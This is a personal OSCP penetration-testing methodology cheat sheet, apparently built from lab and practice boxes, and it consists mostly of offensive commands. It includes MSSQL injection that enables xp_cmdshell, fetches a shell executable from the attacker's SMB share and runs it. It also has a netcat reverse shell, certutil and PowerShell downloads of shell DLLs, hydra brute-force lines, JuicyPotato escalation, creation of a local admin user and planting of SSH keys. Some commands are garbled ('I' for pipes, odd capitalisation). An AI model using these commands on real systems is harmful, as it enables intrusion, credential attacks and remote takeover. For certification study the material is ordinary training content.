OSCP Methodology
Enumeration/Footholds:
**all services try default credentials: admin/admin, root/root, admin/password, root/password
- find a good small wordlist to do this with
***all services: admin/root/password/<service name>/users/<blank>, etc.
*take all files available on ports (ftp, smb, etc.) binwalk and examine.
Port Enumeration:
ports=$(nmap -p- --min-rate=1000 -T4 192.168.178.99 I grep A[0-9] I cut -d '/' -f 1 I tr '\n' ',' I sed s/,$//) && nmap -sC -sV -p$ports 192.168.178.99 I tee nmap.txt sudo $(which autorecon) <ip> : check udp
echo abc I nc <ip> <port> *** Enumerate all ports, banner grab, google results (see 10.1.1.89)
Tips:
**Full enumeration on all ports, search different wording for services, see 10.1.1.65. Google responses, etc.
**Box hostname could give hint to exploit path
Web Enumeration:
*immediately run dirb and nikto. Run wfuzz to get dirs then use dirbuster.
nmap <ip> --script=http-enum.nse nikto -h <ip> I tee nikto.txt
dirb <ip> <wordlist> common.txt, small.txt, medium.txt
dirb http://10.11.1.39/cgi-bin/ /usr/share/wordlists/dirb/common.txt -X .sh I tee dirb2.txt dirbuster (use medium list or try different extensions, like sh, if you don't find anything)
ffuf -c -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://localhost:9885/FUZZ gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://relevant.thm:49663 Soft 404s:
# use to see what the common 200 "soft 404" number of characters returns
wfuzz -w /usr/share/dirb/wordlists/common.txt --hc 404 http://192.168.178.99:8089/FUZZ # shows 9 chars, use -hh 9 to exclude 200 responses with 9 characters
wfuzz -w /usr/share/dirb/wordlists/common.txt --hc 404 --hh 9 http://192.168.178.99:8089/FUZZ wpscan --enumerate u --url http://funbox.fritz.box (enumerates users)
wpscan --enumerate ap --url http://192.168.152.77 I tee wpscan.txt (aggressive too) Subdomain enum:
wfuzz -c -w /opt/Seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm"
See what the wordcount is, in example its 290, put this in the --hw to exclude
wfuzz -c -w /opt/Seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" --hw 290 Add domain to /etc/hosts
Tips:
*any files found in other services, check for it in the webservers. Especially an ftp or smb that you can upload to, see if that path exists on the website
*Burpsuite to modify requests, see nickel.
*Check https certificate for info
*Full enumeration on all web ports, not matter what, google what you get back
*check cookies, source code, js debugger, network, encoding
*file <file> on files, even after decoding, might be multiple layers of encoding.
*check for backup files, .bak, .backup, etc.
*/cgi-bin/ look for .sh files for shellshock
***check addons, like in /classes, /include, etc. and look them up on searchsploit/exploitdb
***brute force all users
Web Exploitation Enumeration:
*lFI/RFI: add %00 to end of file eg /etc/passwd%00
*Try to serve a shell in R/lFI in the file format the server uses, like a .cgi shell, .py, .php, etc.
*Check for default credentials
*webdav: davtest -url http://<ip>
**for cmd injection you may have to encode spaces either with ${IFS}
** check burpsuite or console to see responses to cmd injection
**Use name of box, use searchsploit, look through all pages!!! See clamav retired box. test if you have remote command execution by issuing ping <ip>
then listen with tcpdump: tcpdump -i tun0 icmp
**can just inspect if there is a password as dots.
SQL Injection
https://portswigger.net/web-security/sql-injection/cheat-sheet
linux/mysql:
a' OR 1=1; #
Windows/mssql: (see DJ box) a' OR 1=1 --
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQl%20Injection/MSSQl%20Injection.md#mssql-read-file a' UNION SElECT 1,2; EXEC sp_configure 'show advanced options', 1 --
a' UNION SElECT 1,2; EXEC sp_configure 'xp_cmdshell', 1 -- a' UNION SElECT 1,2; RECONFIGURE --
a' UNION SElECT 1,2; EXEC xp_cmdshell "ping -n 1 192.168.119.130" -- wireshark showed it worked
a' UNION SElECT 1,2; EXEC xp_cmdshell "copy \\192.168.119.130\share\shell443.exe C:\shell.exe" -- a' UNION SElECT 1,2; EXEC xp_cmdshell "C:\shell.exe" --
Tips:
*May have to mess with format, ex: a',1); SElECT 1 -- from 10.11.1.229
SQL Foothold
With credentials from either other enumeration or brute forcing, try logging in. MSSQl can often lead to RCE through xpcmdshell mssql-cli -U sa -P poiuytrewq -S 10.11.1.31
EXECUTE sp_configure 'show advanced options', 1; RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;
exec xp_cmdshell whoami
exec xp_cmdshell "copy \\192.168.119.130\share\shell443.exe ." exec xp_cmdshell "shell443.exe"
SMB Enumeration
smbclient --no-pass -l //<IP> smbclient --no-pass //<ip>/<share> enum4linux -a <ip>
nmap --script smb-enum-users -p139,445 10.1.1.68 **from retired box, used found user to brute force other service Edit config to allow older smb version negotiation if issue connecting:
edit /etc/samba/smb.conf, under [global]: client min protocol = lANMAN1
service smbd restart
Show samba version if not seen in commands:
sudo ngrep -i -d tun0 's..a..m..b..a.*[[:digit:]]' smbclient --no-pass -l //10.11.1.115
Tips:
*Some samba exploits will work on samba versions even if exploit doesn't explicitly say that version
*See 10.11.1.136 for example of symlink traversal: https://github.com/roughiz/Symlink-Directory-Traversal-smb-manually
SSH Enumeration/Exploitation
If need a different ssh key negotiation/protocol (from 10.11.1.136), edit ~/.ssh/config Host 10.11.1.136
Ciphers 3des-cbc
KexAlgorithms +diffie-hellman-group1-sha1 PubkeyAcceptedKeyTypes=+ssh-dss
For exploitation add your pub key (/home/kali/.ssh/id_rsa.pub) to target's ~/.ssh/authorized_keys If you get a private key, chmod 600 <key>
ssh -i dsa_key bob@10.11.1.136
Brute Forcing
Web forms:
hydra -l users.txt -P users.txt -f 10.11.1.227 http-get /localstart.asp
hydra -l admin -P ../rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=AUSERA&password=APASSA:nvalid" -V (Use the POST string from inspector in browser to make sure you have all parameters) Ex:
hydra -l "root@localhost" -P /usr/share/wordlists/rockyou.txt 10.11.1.39 http-post-form "/otrs/index.pl:Action=login&RequestedURl=&lang=en&TimeOffset=240&User=AUSERA&Password=APASSA:login failed"
nmap -p80 --script http-form-brute 10.10.10.43 --script-args http-form-brute.hostname=10.10.10.43,http-form-brute.path=/department/login.php,http- brute.method=POST,uservar=username,passvar=password,http-form-brute.onfailure="nvalid"
Other Services:
hydra -l "joe" -P /usr/share/wordlists/rockyou.txt 192.168.152.77 ftp
hydra -l megan -P /usr/share/wordlists/wfuzz/others/common_pass.txt -I 10.1.1.27 ssh hydra -l sa -P /usr/share/wordlists/rockyou.txt 10.1.1.68 mssql
hydra -l user.txt -P tv.txt 10.11.1.227 -s 27900 mssql (-s <port>)
hydra -l /usr/share/metasploit-framework/data/wordlists/sid.txt -s 1521 10.10.10.82 oracle-sid
Tips:
*use cewl to generate wordlists from websites
cewl http://192.168.122.49/index.html -w cewl.txt
Mail Services
https://book.hacktricks.xyz/pentesting/pentesting-smtp https://book.hacktricks.xyz/pentesting/pentesting-pop
telnet <ip> <110 I 25> (smtp/25 for sending, pop/110 or imap/143 for receiving) nmap -sV 192.168.178.42 --script smtp-enum-users -p 25
Privilege Escalation:
General Tips:
Try known/easy credentials on privileged accounts Check for internal services using netstat -anob Run exploits multiple times
Try multiple kernel/OS exploits
look for ssh private keys or writeable authorized_keys files.
*** For reverse shells use port that is opened on machine, usually 443 or 80, but sometimes whatever web port they have open
Linux Privilege Escalation
Places to look: /var/www, /opt, .htpasswd linpeas.sh
linux-exploit-suggester.sh
Don't get stuck any single one Google kernel version for exploits linenum.sh
SQl: mysql -D <database> -u <user> --password=<pass> --execute"show tables;" Select * from <table>;
SUID, sudo -l, gtfobins
Try su to other users using their username as password, password, root, etc. look for writeable scrips. .sh, .py, etc.
Crontabs: ls -la /etc/cron* Cat /etc/crontab
Ps auxf
Pspy to list processes
Path injection: if a program running as higher priv calls a binary without the full path, try to make your own version of it and then include your current directory in path: PATH=.:$PATH
If you have access to a webserver that runs at root (see 10.11.1.141), add a shell in that server's file format and use a lFI to call it. Commands to use when you have higher priv cmd execution:
Nc <ip> <port> -e /bin/bash
Bash reverse shell, others, see payloadsallthethings Add your public key to /root/.ssh/authorized_keys
gcc -m32 <file>.c -o <file> compile as 32bit.
gcc -m32 -Wl,--hash-style=both 9542.c -o 9542
For exploitation add your pub key (/home/kali/.ssh/id_rsa.pub) to target's ~/.ssh/authorized_keys **alternate if can't get shell
Tips:
***always guess easy passwords to su as another user: password, root, username, etc.
**When modifying a file called by some automatic process, you may have to try to catch it at different times when different users, potentially root, call it. See PG funbox. pspy to look at processes.
**Google any binaries in cron or running. Google <bin/file> privilege escalation.
Windows Privilege Escalation
python ~/tools/windows-exploit-suggester.py -i systeminfo.txt -d ~/tools/2021-10-01-mssb.xls Winpeas.exe, winpeas.bat
Tasklist /v Sc query
**google OS version for exploits
Whoami /priv : if SEimpersonatePriv you can probably use juicy potato or printspoofer
.\JuicyPotato.exe -l 6666 -p "c:\users\tony\shell.exe" -t *
.\JuicyPotato32.exe -l 6666 -c "{9B1F122C-2982-4e91-AA8B-E071D54F2A4D}" -p "c:\wamp\www\shell443.exe" -t * Try hacktricks juicypotato link to interesting ClSID's and try multiple ones
set PATH=%SystemRoot%\system32;%SystemRoot%; A fix for if whoami doesn't work
**Search all programs in program files
C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe -ep bypass C:\users\tony\paperstream.ps1 A full path to powershell if needed
Mess around with payloads, usually windows/shell_reverse_tcp works best. reg query HKlM /f pass /t REG_SZ /s
Command injection add admin user (can use this to login to rdp if rdp is open): net user /add test testtest
net localgroup administrators test /add
**make sure paying attention to paths: programdata vs program files, etc. https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#search- the-registry-for-key-names-and-passwords
https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
File Transfer
Wget http://<ip>:8000/<file>
sudo python3 smbserver.py share ./ Copy \\10.10.14.13\share\<file>.exe .
If error about smb1: Sudo python3 smbserver.py share ./ -smb2support
certutil -urlcache -split -f http://192.168.118.3/shell.dll shell.dll
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.49.103/shell80.dll','C:\\program files\\plantronics\\spokes3g\plugins\shell.dll')" powershell -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.49.103/shell80.dll')"
C:/windows/temp/ C:/users/public/
to extract: base64 -w <file> #only if smallish file, -w gets rid of line wrapping
Process:
Run nmap, autorecon, dirb/nikto if immediate webserver.
**Run nmap multiple times, make sure you don't miss something
While scripts running do initial recon on webserver or services most familiar with When scripts done, investigate http results, any ports that could give users or hints
**Fully investigate each port to identify the service.
Continue with webserver or familiar ports unless scripts point to obvious route If you hit a wall on those, go through each other service before going back.